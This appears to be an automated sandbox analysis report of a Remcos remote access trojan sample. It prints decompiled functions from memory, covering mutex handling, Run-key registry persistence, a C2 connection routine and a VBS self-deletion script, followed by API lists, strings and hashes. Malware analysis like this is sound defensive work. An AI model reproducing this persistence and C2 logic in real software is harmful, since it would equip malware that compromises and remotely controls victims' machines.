									E0040846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t461 = CreateThread;
									} else {
										_t199 = 2;
										_t485 = E0042F218(_t450, 0x46c578, __eflags, _t199);
										 *_t485 = 0;
										_t386 = L00401E49(0x46c578, _t450, __eflags, 0x35);
										_t203 = L00401F95(_t386);
										_t461 = CreateThread;
										__eflags =  *_t203;
										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E00415938, _t485, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t193 = 2;
										_t484 = E0042F218(_t450, _t471, __eflags, _t193);
										 *_t484 = 1;
										_t382 = L00401E49(0x46c578, _t450, __eflags, 0x35);
										_t196 = L00401F95(_t382);
										__eflags =  *_t196;
										__eflags = 0;
										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
										CreateThread(0, 0, E00415938, _t484, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46ba75 = 1;
										_t185 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x25));
										_t187 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x26));
										_t450 =  *_t185;
										L00401EFA(0x46c0e0,  *_t185, _t185, E0041800F( &_v780,  *_t185, _t187));
										L00401EF0();
										__eflags = 0;
										CreateThread(0, 0, 0x401bcd, 0, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t471 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x2c));
										_t182 = E00436769(_t180, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x2d)));
										__eflags =  *_t471;
										_t450 = _t182;
										__eflags =  *_t471 != 0;
										E0040A679(_t182);
									}
									_t160 = E00416D9E( &_v772, _t461, __eflags); // executed
									L00401EFA(0x46c584, _t450, _t471, _t160);
									_t360 =  &_v776;
									L00401EF0();
									_t163 =  *0x46bd14;
									_t269 = 0;
									__eflags = _t163;
									if(_t163 != 0) {
										 *_t163(0); // executed
									}
									CreateThread(_t269, _t269, E0040D0B5, _t269, _t269, _t269); // executed
									__eflags =  *0x46bd4e;
									if( *0x46bd4e != 0) {
										CreateThread(_t269, _t269, 0x40fac7, _t269, _t269, _t269);
									}
									__eflags =  *0x46bd4f;
									if( *0x46bd4f != 0) {
										CreateThread(_t269, _t269, 0x40ffe5, _t269, _t269, _t269);
									}
									_t165 =  *0x46a9d0; // 0x1
									_t166 = _t165 - _t269;
									__eflags = _t166;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t166 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t224 = L00401E49(0x46c578, "0", __eflags, 0xd);
									_t506 = _t501 - 0x18;
									_t449 = _t224;
									E004172DA(_t506, _t224);
									_t226 = L0040CE44(__eflags);
									_t501 = _t506 + 0x18;
									__eflags = _t226 - _t272;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t272 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t265 = E00410885(L00401F95(0x46c518), "WD",  &_v780);
						__eflags = _t265;
						if(_t265 != 0) {
							L00410CE2(L00401F95(0x46c518), __eflags, "WD");
							L0040FD95();
							L71:
							_push("User");
							L72:
							E004075C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00402084(_t269,  &_v776));
							E00402084(_t269, _t497 - 4, "[Info]");
							L00416C80(_t269, _t461);
							_t360 =  &_v784;
							E00401FC7(); // executed
							L73:
							E00411929(); // executed
							asm("int3");
							_push(_t471);
							_t481 = _t360 + 0x68;
							E0040D515(_t481);
							_t284 = _t481;
							 *_t284 = 0x460788;
							 *_t284 = 0x460744;
							return E004304F6(_t284);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D544( &_v700, __edx, __eflags, "license_code.txt", 2);
							__ecx = 0x46c578;
							__ecx = L00401E49(0x46c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = E0040E8BB( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D4F5( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							E00401FC7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t97;
						}
					}
				}
			}


































































































                                          0x0040c2be
                                          0x0040c2d4
                                          0x0040c2d9
                                          0x0040c2dc
                                          0x0040c2e1
                                          0x0040c2eb
                                          0x0040c2f0
                                          0x0040c2fa
                                          0x0040c303
                                          0x0040c308
                                          0x0040c30c
                                          0x0040c315
                                          0x0040c31a
                                          0x0040c320
                                          0x0040c387
                                          0x0040c387
                                          0x0040c3a5
                                          0x0040c3a8
                                          0x0040c3ca
                                          0x0040c3d0
                                          0x0040c3d8
                                          0x0040c3e1
                                          0x0040c3ea
                                          0x0040c3f9
                                          0x0040c3fe
                                          0x0040c405
                                          0x0040c416
                                          0x0040c418
                                          0x0040c41f
                                          0x0040c426
                                          0x0040c42b
                                          0x0040c42d
                                          0x0040c434
                                          0x0040c43a
                                          0x0040c462
                                          0x0040c46d
                                          0x0040c471
                                          0x0040c477
                                          0x0040c479
                                          0x0040c47b
                                          0x0040c483
                                          0x0040c48a
                                          0x0040c48a
                                          0x0040c4a7
                                          0x0040c4a9
                                          0x0040c4b0
                                          0x0040c4b2
                                          0x0040c4bc
                                          0x0040c4be
                                          0x0040c4c3
                                          0x0040c4d5
                                          0x0040c4dc
                                          0x0040c4e4
                                          0x0040c4e6
                                          0x0040c4e9
                                          0x0040c4ef
                                          0x0040c4f5
                                          0x0040c4fa
                                          0x0040c87d
                                          0x0040c881
                                          0x0040c886
                                          0x00000000
                                          0x0040c500
                                          0x0040c500
                                          0x0040c510
                                          0x0040c516
                                          0x0040c51b
                                          0x0040c526
                                          0x0040c52b
                                          0x0040c534
                                          0x0040c539
                                          0x0040c544
                                          0x0040c54d
                                          0x0040c552
                                          0x0040c55b
                                          0x0040c564
                                          0x0040c55d
                                          0x0040c55d
                                          0x0040c55d
                                          0x0040c569
                                          0x0040c56e
                                          0x0040c573
                                          0x0040c575
                                          0x0040c579
                                          0x0040c579
                                          0x0040c57e
                                          0x0040c583
                                          0x0040c587
                                          0x0040c592
                                          0x0040c599
                                          0x0040c59c
                                          0x0040c59e
                                          0x0040c5a4
                                          0x0040c5a6
                                          0x0040c5ac
                                          0x0040c5d0
                                          0x0040c5d2
                                          0x0040c5d7
                                          0x0040c5d8
                                          0x0040c5da
                                          0x0040c5dc
                                          0x0040c5dc
                                          0x0040c5ae
                                          0x0040c5ae
                                          0x0040c5af
                                          0x0040c5b5
                                          0x0040c5b8
                                          0x0040c5ba
                                          0x0040c5ba
                                          0x0040c5b8
                                          0x0040c5ac
                                          0x0040c5a4
                                          0x0040c59c
                                          0x0040c5f1
                                          0x0040c5f4
                                          0x0040c5f6
                                          0x0040c5f6
                                          0x0040c611
                                          0x0040c62a
                                          0x0040c62d
                                          0x0040c644
                                          0x0040c647
                                          0x0040c65e
                                          0x0040c661
                                          0x0040c674
                                          0x0040c677
                                          0x0040c684
                                          0x0040c689
                                          0x0040c689
                                          0x0040c68c
                                          0x0040c68c
                                          0x0040c68f
                                          0x0040c692
                                          0x0040c692
                                          0x0040c697
                                          0x0040c69b
                                          0x0040c6a8
                                          0x0040c6bd
                                          0x0040c6c2
                                          0x0040c6d5
                                          0x0040c6de
                                          0x0040c6e3
                                          0x0040c6e3
                                          0x0040c69b
                                          0x0040c6e8
                                          0x0040c6ec
                                          0x0040c89c
                                          0x0040c8ab
                                          0x0040c8b3
                                          0x0040c8d1
                                          0x0040c8d3
                                          0x0040c8d8
                                          0x0040c8e8
                                          0x0040c8ed
                                          0x00000000
                                          0x0040c6f2
                                          0x0040c6f2
                                          0x0040c6f9
                                          0x0040c78f
                                          0x0040c6ff
                                          0x0040c70a
                                          0x0040c71c
                                          0x0040c731
                                          0x0040c736
                                          0x0040c73e
                                          0x0040c744
                                          0x0040c75c
                                          0x0040c776
                                          0x0040c77d
                                          0x0040c780
                                          0x0040c781
                                          0x0040c781
                                          0x0040c799
                                          0x0040c7a3
                                          0x0040c7ab
                                          0x0040c7ad
                                          0x0040c7ae
                                          0x0040c7b7
                                          0x0040c7ba
                                          0x0040c7bc
                                          0x0040c7ce
                                          0x0040c7be
                                          0x0040c7c4
                                          0x0040c7c9
                                          0x0040c7c9
                                          0x0040c7d5
                                          0x0040c7de
                                          0x0040c7de
                                          0x0040c7e0
                                          0x0040c7e1
                                          0x0040c7e1
                                          0x0040c7e4
                                          0x0040c7e8
                                          0x0040c7ea
                                          0x0040c7ea
                                          0x0040c7ef
                                          0x0040c7f7
                                          0x0040c7ff
                                          0x0040c80a
                                          0x0040c829
                                          0x0040c82f
                                          0x0040c834
                                          0x0040c837
                                          0x0040c840
                                          0x0040c845
                                          0x0040c851
                                          0x0040c853
                                          0x0040c8f2
                                          0x0040c8f2
                                          0x0040c8fe
                                          0x0040c903
                                          0x0040c909
                                          0x0040c90e
                                          0x0040c91d
                                          0x0040c91f
                                          0x0040c924
                                          0x0040c938
                                          0x0040c943
                                          0x0040c949
                                          0x0040c94b
                                          0x0040c951
                                          0x0040c953
                                          0x0040c955
                                          0x0040c955
                                          0x00000000
                                          0x0040c955
                                          0x0040c94d
                                          0x0040c94d
                                          0x0040c957
                                          0x0040c957
                                          0x0040c95c
                                          0x0040c968
                                          0x0040c968
                                          0x0040c975
                                          0x0040c987
                                          0x0040c999
                                          0x0040c99e
                                          0x0040c9a3
                                          0x0040c9c0
                                          0x0040c9d2
                                          0x0040c9f1
                                          0x0040ca09
                                          0x0040ca0b
                                          0x0040ca54
                                          0x0040ca0d
                                          0x0040ca0f
                                          0x0040ca16
                                          0x0040ca22
                                          0x0040ca29
                                          0x0040ca2b
                                          0x0040ca30
                                          0x0040ca36
                                          0x0040ca48
                                          0x0040ca4b
                                          0x0040ca4d
                                          0x0040ca4d
                                          0x0040ca6a
                                          0x0040ca6c
                                          0x0040ca70
                                          0x0040ca77
                                          0x0040ca81
                                          0x0040ca88
                                          0x0040ca8a
                                          0x0040ca8f
                                          0x0040ca95
                                          0x0040caa1
                                          0x0040caa4
                                          0x0040caa6
                                          0x0040caa6
                                          0x0040cabb
                                          0x0040cabd
                                          0x0040cac3
                                          0x0040cad0
                                          0x0040cae5
                                          0x0040caea
                                          0x0040cafd
                                          0x0040cb06
                                          0x0040cb0b
                                          0x0040cb17
                                          0x0040cb19
                                          0x0040cb19
                                          0x0040cb2e
                                          0x0040cb30
                                          0x0040cb49
                                          0x0040cb58
                                          0x0040cb5d
                                          0x0040cb60
                                          0x0040cb63
                                          0x0040cb66
                                          0x0040cb66
                                          0x0040cb6f
                                          0x0040cb7a
                                          0x0040cb7f
                                          0x0040cb83
                                          0x0040cb88
                                          0x0040cb8d
                                          0x0040cb8f
                                          0x0040cb91
                                          0x0040cb94
                                          0x0040cb94
                                          0x0040cba0
                                          0x0040cba2
                                          0x0040cba9
                                          0x0040cbb5
                                          0x0040cbb5
                                          0x0040cbb7
                                          0x0040cbbe
                                          0x0040cbca
                                          0x0040cbca
                                          0x0040cbcc
                                          0x0040cbd1
                                          0x0040cbd1
                                          0x0040cbd3
                                          0x00000000
                                          0x0040cbd5
                                          0x0040cbd5
                                          0x0040cbd8
                                          0x0040cbda
                                          0x00000000
                                          0x0040cbda
                                          0x0040cbd8
                                          0x00000000
                                          0x0040c859
                                          0x0040c85d
                                          0x0040c862
                                          0x0040c865
                                          0x0040c869
                                          0x0040c86e
                                          0x0040c873
                                          0x0040c876
                                          0x0040c878
                                          0x00000000
                                          0x0040c87a
                                          0x0040c87c
                                          0x00000000
                                          0x0040c87c
                                          0x0040c878
                                          0x0040c853
                                          0x0040c6ec
                                          0x0040c43c
                                          0x0040c440
                                          0x0040c453
                                          0x0040c45a
                                          0x0040c45c
                                          0x0040cbef
                                          0x0040cbf9
                                          0x0040cbfe
                                          0x0040cbfe
                                          0x0040cc03
                                          0x0040cc17
                                          0x0040cc26
                                          0x0040cc2b
                                          0x0040cc33
                                          0x0040cc37
                                          0x0040cc3c
                                          0x0040cc3c
                                          0x0040cc41
                                          0x0040cc42
                                          0x0040cc43
                                          0x0040cc48
                                          0x0040cc4d
                                          0x0040e032
                                          0x0040c177
                                          0x0040c183
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040c45c
                                          0x0040c322
                                          0x0040c322
                                          0x0040c326
                                          0x00000000
                                          0x0040c328
                                          0x0040c328
                                          0x0040c32c
                                          0x0040c32e
                                          0x00000000
                                          0x0040c330
                                          0x0040c330
                                          0x0040c331
                                          0x0040c339
                                          0x0040c33d
                                          0x0040c344
                                          0x0040c34e
                                          0x0040c355
                                          0x0040c357
                                          0x0040c35b
                                          0x0040c360
                                          0x0040c364
                                          0x0040c369
                                          0x0040c36d
                                          0x0040c372
                                          0x0040c37b
                                          0x0040c37d
                                          0x0040c37d
                                          0x0040c37e
                                          0x0040c384
                                          0x0040c384
                                          0x0040c32e
                                          0x0040c326

                                          APIs
                                          • OpenMutexA.KERNEL32 ref: 0040C471
                                          • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C483
                                          • CloseHandle.KERNEL32(00000000), ref: 0040C48A
                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4E9
                                          • GetLastError.KERNEL32 ref: 0040C4EF
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\logagent.exe,00000104), ref: 0040C510
                                            • Part of subcall function 0040E8BB: __EH_prolog.LIBCMT ref: 0040E8C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                                          • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\logagent.exe$Exe$Exe$Inj$Octopus-GM39UT$ProductName$Remcos$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
                                          • API String ID: 1247502528-3937525246
                                          • Opcode ID: c4514ffebb5a2fcefdb17c9af0de6ab281086a106f02c27a89bcde85ccf605b6
                                          • Instruction ID: 97ecaa49e5e083256040f844ff0fd3ae96e39466cf8f0e182fdc5e320802d438
                                          • Opcode Fuzzy Hash: c4514ffebb5a2fcefdb17c9af0de6ab281086a106f02c27a89bcde85ccf605b6
                                          • Instruction Fuzzy Hash: 5432F460B443516BDA1577729CA6B3F26898B8170CF04053FB542BB2E3EE7C9D4583AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040AD84, Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 259registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E0040AD84() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				signed int _t58;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t87;
				signed char _t123;
				signed char _t124;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				E0041015B();
				if( *0x46a9d4 != 0x30) {
					L00409D73();
				}
				_t227 =  *0x46bd6b - 1; // 0x0
				if(_t227 == 0) {
					E0041537E(_t227);
				}
				if( *0x46ba75 != 0) {
					E00417754(L00401EEB(0x46c0e0));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x46bb02 - 1; // 0x1
				if(_t229 == 0) {
					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8)); // executed
				}
				_t230 =  *0x46bafb - 1; // 0x0
				if(_t230 == 0) {
					E00410D5C(0x80000002, _t214, L00401EEB(0x46c4e8));
				}
				_t231 =  *0x46bb00 - 1; // 0x0
				if(_t231 == 0) {
					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
				}
				L00431F00(0,  &_v668, 0, 0x208);
				_t49 = E00402489();
				_t50 = L00401F95(0x46c560);
				_t53 = E00410A30(L00401F95(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49); // executed
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F95(0x46c518)); // executed
				_t56 = E004074E4(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
				}
				_t58 = SetFileAttributesW( &_v668, 0x80); // executed
				_t123 =  ~_t58;
				asm("sbb bl, bl");
				E004030A6(_t123,  &_v148, E004172DA( &_v76, E00417093( &_v28)), 0, _t233, L".vbs");
				L00401EF0();
				E00401FC7();
				E00404429(_t123,  &_v124, E004030A6(_t123,  &_v28, E0040427F(_t123,  &_v76, E0043987F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				L00401EF0();
				L00401EF0();
				E00404405(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040427F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401EF0();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E00403311(E004030A6(_t124,  &_v28, E00404405(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040427F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					L00401EF0();
					L00401EF0();
					L00401EF0();
				}
				E00403311(E004030A6(_t124,  &_v100, E004030A6(_t124,  &_v28, E0040427F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t235 = _t124;
				if(_t124 != 0) {
					E0040766C(_t124,  &_v52, 0, L"wend\n");
				}
				_t82 = E004074E4(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
					L00401EF0();
					L00401EF0();
				}
				E0040766C(0x45f724,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = L00401EEB( &_v124);
				_t85 = E00402489();
				_t87 = E00417947(L00401EEB( &_v52), _t85 + _t85, _t84, 0); // executed
				if(_t87 != 0) {
					ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0); // executed
				}
				ExitProcess(0);
			}

























                                          0x0040ad90
                                          0x0040ad9c
                                          0x0040ad9e
                                          0x0040ad9e
                                          0x0040ada6
                                          0x0040adac
                                          0x0040adae
                                          0x0040adae
                                          0x0040adba
                                          0x0040adc8
                                          0x0040adc8
                                          0x0040add2
                                          0x0040add7
                                          0x0040addd
                                          0x0040adee
                                          0x0040adf3
                                          0x0040adf4
                                          0x0040adfa
                                          0x0040ae0b
                                          0x0040ae10
                                          0x0040ae11
                                          0x0040ae17
                                          0x0040ae2b
                                          0x0040ae30
                                          0x0040ae41
                                          0x0040ae50
                                          0x0040ae58
                                          0x0040ae79
                                          0x0040ae81
                                          0x0040ae83
                                          0x0040ae8e
                                          0x0040ae8e
                                          0x0040aea1
                                          0x0040aeb3
                                          0x0040aebe
                                          0x0040aec0
                                          0x0040aecf
                                          0x0040aecf
                                          0x0040aedd
                                          0x0040aee4
                                          0x0040aeeb
                                          0x0040af04
                                          0x0040af0d
                                          0x0040af15
                                          0x0040af4a
                                          0x0040af53
                                          0x0040af5b
                                          0x0040af76
                                          0x0040af7f
                                          0x0040af84
                                          0x0040af84
                                          0x0040af87
                                          0x0040afbb
                                          0x0040afc3
                                          0x0040afcb
                                          0x0040afd3
                                          0x0040afd3
                                          0x0040b00b
                                          0x0040b013
                                          0x0040b01b
                                          0x0040b023
                                          0x0040b028
                                          0x0040b02a
                                          0x0040b034
                                          0x0040b034
                                          0x0040b047
                                          0x0040b04c
                                          0x0040b04e
                                          0x0040b073
                                          0x0040b07b
                                          0x0040b083
                                          0x0040b083
                                          0x0040b090
                                          0x0040b099
                                          0x0040b0a2
                                          0x0040b0b7
                                          0x0040b0c0
                                          0x0040b0d4
                                          0x0040b0d4
                                          0x0040b0db

                                          APIs
                                            • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                            • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AE8E
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AEA1
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AECF
                                          • SetFileAttributesW.KERNELBASE(?,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AEDD
                                            • Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
                                            • Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
                                            • Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B0D4
                                          • ExitProcess.KERNEL32 ref: 0040B0DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                          • API String ID: 3659626935-3677834288
                                          • Opcode ID: 4b5536219b413276142a3790f95bbeb577c82c290f89665ed1485fad453a9376
                                          • Instruction ID: 1589e96350d2b26083133e670dfbb90ce18de44782133b39b347ac2ed663d9b9
                                          • Opcode Fuzzy Hash: 4b5536219b413276142a3790f95bbeb577c82c290f89665ed1485fad453a9376
                                          • Instruction Fuzzy Hash: D1816D71A102145ACB15FBA1DCA69EF776A9F50704F10003FB806771E2EE7C5E8A869D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411929, Relevance: 30.5, APIs: 6, Strings: 11, Instructions: 743sleepnetworkthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000000,00000029,73B743E0,0046C578,00000000), ref: 0041197A
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • gethostbyname.WS2_32(00000000), ref: 00411B6B
                                          • htons.WS2_32(00000000), ref: 00411BA9
                                          • Sleep.KERNEL32(00000000,00000002), ref: 004123A6
                                            • Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                            • Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                            • Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                                          • GetTickCount.KERNEL32 ref: 00411DA2
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001667F,00000000,00000000,00000000), ref: 00412355
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
                                          • String ID: (TLS)$%I64u$3.2.1 Pro$C:\Windows\SysWOW64\logagent.exe$Connected to $Connecting to $Disconnected!$Exe$Octopus-GM39UT$[Info]$name
                                          • API String ID: 2130001850-3446537527
                                          • Opcode ID: 53f1d31ab45dcf2409cf5ff9e38295537c92501bbda82d1399bf5fe1de45c5f3
                                          • Instruction ID: c8c226d7e30845bf2bb3d2e67be1d86719b60e177ee7695842f0b4eb2dcf0a18
                                          • Opcode Fuzzy Hash: 53f1d31ab45dcf2409cf5ff9e38295537c92501bbda82d1399bf5fe1de45c5f3
                                          • Instruction Fuzzy Hash: ED427A31A102155BCB18F762DD56AEEB375AF50308F5001BFB40AB61E2EF785F858E89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041805B, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LongNamePath
                                          • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                          • API String ID: 82841172-1609423294
                                          • Opcode ID: 74f394d82779ad0012b07e917d5bead4f49688195dfc6a98f3ba2cc81fd7d5ca
                                          • Instruction ID: e17f698a51b082165e1e9e1ea6160020ed1fd31ab47ab9f863ee2cf3c228b6bb
                                          • Opcode Fuzzy Hash: 74f394d82779ad0012b07e917d5bead4f49688195dfc6a98f3ba2cc81fd7d5ca
                                          • Instruction Fuzzy Hash: EE4189721182409AC204FB21DC52DEF77A9BFA4748F50053FF846620F2EE785E4AC65B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004123B9, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 458COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CountEventTick
                                          • String ID: 8E@
                                          • API String ID: 180926312-787191786
                                          • Opcode ID: 65e043957820a90d4195c6ae94db1a57242de9ddaeba944f8e05ce018c461939
                                          • Instruction ID: ea4d81ed4f091483c47e61d79a68d374cc238c57229b35d0877b3eec111e029e
                                          • Opcode Fuzzy Hash: 65e043957820a90d4195c6ae94db1a57242de9ddaeba944f8e05ce018c461939
                                          • Instruction Fuzzy Hash: A0E183316083019BC614FB72D957AEE72A89B95708F40083FF546B71E2EE7C9A44879F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410305, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 374filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323
                                            • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                                            • Part of subcall function 0041432B: FindCloseChangeNotification.KERNELBASE( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
                                            • Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A
                                          • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
                                          • DeleteFileW.KERNELBASE(00000000,0045F464,0045F464,0045F464), ref: 004105D6
                                          • DeleteFileW.KERNELBASE(00000000,0045F464,0045F464,0045F464), ref: 00410604
                                          • Sleep.KERNELBASE(000001F4,0045F464,0045F464,0045F464), ref: 0041061D
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          Strings
                                          Memory Dump Source
